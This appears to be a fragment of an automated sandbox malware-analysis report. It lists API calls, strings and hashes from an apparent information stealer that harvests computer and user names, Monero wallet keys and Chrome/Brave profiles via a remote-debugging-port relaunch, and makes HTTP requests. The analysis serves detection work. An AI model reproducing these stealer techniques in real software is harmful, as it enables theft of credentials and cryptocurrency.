                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 3404098578-2766056989
                                        • Opcode ID: e1a4be6c9ea0a3f90dc8329edd0d79a73435f283606c201a985c9f755c608941
                                        • Instruction ID: 324539030445557ce363d9503e8e885b4becf935190b38c5ffb38be1e708a992
                                        • Opcode Fuzzy Hash: e1a4be6c9ea0a3f90dc8329edd0d79a73435f283606c201a985c9f755c608941
                                        • Instruction Fuzzy Hash: 8D016DB0D44318BAEF10DFE4DC4ABEEBBB8EB14705F209488E705BA1C0C6745581DB99

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1450 e26d93 1451 e26daa 1450->1451 1453 e26d5a-e26d77 call e2ade0 OpenEventA 1451->1453 1454 e26dac-e26dc2 call e26bc0 call e25d60 CloseHandle ExitProcess 1451->1454 1459 e26d95-e26da4 CloseHandle Sleep 1453->1459 1460 e26d79-e26d91 call e2ade0 CreateEventA 1453->1460 1459->1451 1460->1454
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01A88938,?,00E310F4,?,00000000,?,00E310F8,?,00000000,00E30AF3), ref: 00E26D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E26D88
                                        • CloseHandle.KERNEL32(00000000), ref: 00E26D99
                                        • Sleep.KERNEL32(00001770), ref: 00E26DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,01A88938,?,00E310F4,?,00000000,?,00E310F8,?,00000000,00E30AF3), ref: 00E26DBA
                                        • ExitProcess.KERNEL32 ref: 00E26DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: d38760929d17c6b70def5727af49b99ded711719dd670ddf734369220a201d39
                                        • Instruction ID: b5c441181800a468162fdbc968e77f6a83acb5214f22edde38d1078361d5e09f
                                        • Opcode Fuzzy Hash: d38760929d17c6b70def5727af49b99ded711719dd670ddf734369220a201d39
                                        • Instruction Fuzzy Hash: 33F05E30A44229EFEB10BBA0FD0ABBE33B4AF04B05F141619B512B9184CBB55900CB91

                                        Control-flow Graph

                                        APIs
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14889
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14899
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1274457161-4251816714
                                        • Opcode ID: 83fecc6b1f85e26d098ac72a3ac90cb972b9ba9eee018cadf30f0e3784f0f809
                                        • Instruction ID: a9a20ec5fd2f29cdf1e658c004ceef4f48c932f71b47d10ad097c1f5cefb2c69
                                        • Opcode Fuzzy Hash: 83fecc6b1f85e26d098ac72a3ac90cb972b9ba9eee018cadf30f0e3784f0f809
                                        • Instruction Fuzzy Hash: 052142B1D00209ABDF14DF64E84AADE7BB5FB45350F149625FA15B72C0EB706609CF81

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E162D0: InternetOpenA.WININET(00E30DFF,00000001,00000000,00000000,00000000), ref: 00E16331
                                          • Part of subcall function 00E162D0: StrCmpCA.SHLWAPI(?,01A8F1A8), ref: 00E16353
                                          • Part of subcall function 00E162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E16385
                                          • Part of subcall function 00E162D0: HttpOpenRequestA.WININET(00000000,GET,?,01A8EB30,00000000,00000000,00400100,00000000), ref: 00E163D5
                                          • Part of subcall function 00E162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E1640F
                                          • Part of subcall function 00E162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E16421
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25478
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        • API String ID: 3287882509-2579291623
                                        • Opcode ID: f34ee74ca7a300730f9c4a958de5a265500f3ad74c3084e94d5a0e8ae5c3bd66
                                        • Instruction ID: 4f739a58af83c770ace580f96884ff4445422dc11117de31850d268a7e344107
                                        • Opcode Fuzzy Hash: f34ee74ca7a300730f9c4a958de5a265500f3ad74c3084e94d5a0e8ae5c3bd66
                                        • Instruction Fuzzy Hash: 4B1116719001189BCB14FF64ED52AED77B9AF50340F445568F91B77492EF30AB44CB51
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27AA0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E27AA7
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 00E27ABF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateComputerNameProcess
                                        • String ID:
                                        • API String ID: 1664310425-0
                                        • Opcode ID: 1a48543ed5c10a63bf5083c8ad0219b3f978d1384b598f3bc94ec81e9d403821
                                        • Instruction ID: cedbbfc3e4ee894899455e12eacb3473f566f6eddb207724ab6dc16792ccb439
                                        • Opcode Fuzzy Hash: 1a48543ed5c10a63bf5083c8ad0219b3f978d1384b598f3bc94ec81e9d403821
                                        • Instruction Fuzzy Hash: F50186B1908359ABC710CF99ED45BAFBBB8F704B21F100219F545F6280D7755A00C7E1
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E1112B
                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E11132
                                        • ExitProcess.KERNEL32 ref: 00E11143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        • API String ID: 1103761159-0
                                        • Opcode ID: 21b883d0efe9db106f37bc8e3267264337461a931a0ab32ee431065daf40e677
                                        • Instruction ID: 116e265f96f8714629de8094f28fc7862949de5ee2427e4157431bbd3fe248d5
                                        • Opcode Fuzzy Hash: 21b883d0efe9db106f37bc8e3267264337461a931a0ab32ee431065daf40e677
                                        • Instruction Fuzzy Hash: 45E08670E45308FBE7209B919C0AB4C76A89B04F05F100084F7087A1C0C6B925404798
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E110B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00E110F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        • API String ID: 2087232378-0
                                        • Opcode ID: 321e4e1eb9980f460e5835835aaedff52793286c7e80e1c30cb73116095fb43e
                                        • Instruction ID: c457123be73b54ccc5edec415f0e03fb31d9595c0014de670908a49bb04f0d9d
                                        • Opcode Fuzzy Hash: 321e4e1eb9980f460e5835835aaedff52793286c7e80e1c30cb73116095fb43e
                                        • Instruction Fuzzy Hash: 29F0E971641314BBE71496A4AC59FAFB7D8E705B04F301488F540E7280D5729E0087A0
                                        APIs
                                          • Part of subcall function 00E27A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27AA0
                                          • Part of subcall function 00E27A70: RtlAllocateHeap.NTDLL(00000000), ref: 00E27AA7
                                          • Part of subcall function 00E27A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00E27ABF
                                          • Part of subcall function 00E279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E111B7), ref: 00E27A10
                                          • Part of subcall function 00E279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E27A17
                                          • Part of subcall function 00E279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E27A2F
                                        • ExitProcess.KERNEL32 ref: 00E111C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                                        • String ID:
                                        • API String ID: 3550813701-0
                                        • Opcode ID: 891fe4e3c72f09d6925307b468a1e73a46b6a5b683f82db4b4bf5b0373e820c2
                                        • Instruction ID: 1d2ad1ef3a25cf2900471a03f2e233a19e025410070402b179e92e25150bff31
                                        • Opcode Fuzzy Hash: 891fe4e3c72f09d6925307b468a1e73a46b6a5b683f82db4b4bf5b0373e820c2
                                        • Instruction Fuzzy Hash: CEE012B9A0532167CA2073B57D07B5B32CC5B1474EF402458FA44A6106FD2AE8404365
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00E30B32,00E30B2F,00000000,?,?,?,00E31450,00E30B2E), ref: 00E1BEC5
                                        • StrCmpCA.SHLWAPI(?,00E31454), ref: 00E1BF33
                                        • StrCmpCA.SHLWAPI(?,00E31458), ref: 00E1BF49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1C8A9
                                        • FindClose.KERNEL32(000000FF), ref: 00E1C8BB
                                        Strings
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E1C534
                                        • Google Chrome, xrefs: 00E1C6F8
                                        • \Brave\Preferences, xrefs: 00E1C1C1
                                        • Preferences, xrefs: 00E1C104
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E1C3B2
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E1C495
                                        • Brave, xrefs: 00E1C0E8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-1869280968
                                        • Opcode ID: 60f3190c686d29f7b89e5400a5d1a1d68d046822ac67e98710dde9183cbf1cb1
                                        • Instruction ID: 9004a5e3ddbaf6a049f6f9d87ed9de62cdd2abeab02300b989e80aae9573df8a
                                        • Opcode Fuzzy Hash: 60f3190c686d29f7b89e5400a5d1a1d68d046822ac67e98710dde9183cbf1cb1
                                        • Instruction Fuzzy Hash: EC5257729101185BCB14FB70ED96EEE73BDAF54304F4455A8B50AB6081EF349B48CFA2
                                        APIs
                                        • wsprintfA.USER32 ref: 00E23B1C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00E23B33
                                        • lstrcat.KERNEL32(?,?), ref: 00E23B85
                                        • StrCmpCA.SHLWAPI(?,00E30F58), ref: 00E23B97
                                        • StrCmpCA.SHLWAPI(?,00E30F5C), ref: 00E23BAD
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E23EB7
                                        • FindClose.KERNEL32(000000FF), ref: 00E23ECC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-2524465048
                                        • Opcode ID: 5fe93c820b04da049bc8b1f360577e82ffe6b8d2ec1640b3a9b922b7f211c3a8
